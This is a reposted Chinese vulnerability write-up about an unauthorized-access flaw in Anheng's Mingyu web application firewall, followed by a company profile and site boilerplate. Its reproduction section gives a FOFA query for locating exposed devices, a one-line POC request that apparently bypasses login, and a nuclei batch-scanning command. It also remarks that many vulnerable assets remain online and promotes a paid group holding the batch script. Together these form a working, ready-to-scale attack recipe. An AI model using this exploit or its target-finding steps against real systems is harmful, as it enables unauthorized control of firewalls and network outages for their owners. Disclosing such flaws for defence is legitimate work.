安恒明御WEB应用防火墙 未授权访问

admin 2022年9月21日12:09:11安全文章评论21 views864字阅读2分52秒阅读模式

0x01 漏洞描述

明御WEB应用防火墙(简称WAF)是一款由安恒信息自主研发,专注为网站、APP等Web应用提供安全防护的专业应用安全防护产品。能够对网站及APP业务流量进行多维度、深层次的安全检测和防护。系统内置五大安全引擎(包括语义分析引擎、机器学习引擎、威胁情报引擎、行为分析引擎、基础特征引擎),可通过主动防护与被动安全相结合的方式识别可疑、已知、未知安全威胁,有效保障网站及APP业务安全、可靠运行。明御WEB应用防火墙系统存在未授权访问漏洞,攻击者通过漏洞可以执行修改配置,导致服务器断网等问题安恒明御WEB应用防火墙 未授权访问

0x02 漏洞复现

fofaapp="安恒信息-明御WAF"

1.执行POC,返回error_0x110005

https://{{Hostname}}/report.m?a=rpc-timed

安恒明御WEB应用防火墙 未授权访问


2.重新访问该域名,即可未授权进入

https://{{Hostname}}

安恒明御WEB应用防火墙 未授权访问


3.nuclei批量验证脚本已发表于知识星球(还存在较多资产)

nuclei.exe -t Anheng_web_fw_Unauthorized.yaml -l subs.txt -stats

安恒明御WEB应用防火墙 未授权访问

(注:本文章为技术分享,禁止任何非授权攻击行为)


网络安全神兵利器分享
网络安全漏洞N/0day分享
    加入星球请扫描下方二维码,更多精彩,敬请期待!
👇👇👇

安恒明御WEB应用防火墙 未授权访问

长按二维码识别进入

0x03 公司简介

江西渝融云安全科技有限公司,2017年发展至今,已成为了一家集云安全、物联网安全、数据安全、等保建设、风险评估、信息技术应用创新及网络安全人才培训为一体的本地化高科技公司,是江西省信息安全产业链企业和江西省政府部门重点行业网络安全事件应急响应队伍成员。
    公司现已获得信息安全集成三级、信息系统安全运维三级、风险评估三级等多项资质认证,拥有软件著作权十八项;荣获2020年全国工控安全深度行安全攻防对抗赛三等奖;庆祝建党100周年活动信息安全应急保障优秀案例等荣誉......

编制:sm

审核:fjh

审核:Dog



原文始发于微信公众号(融云攻防实验室):安恒明御WEB应用防火墙 未授权访问

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年9月21日12:09:11
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  安恒明御WEB应用防火墙 未授权访问 http://cn-sec.com/archives/1309579.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: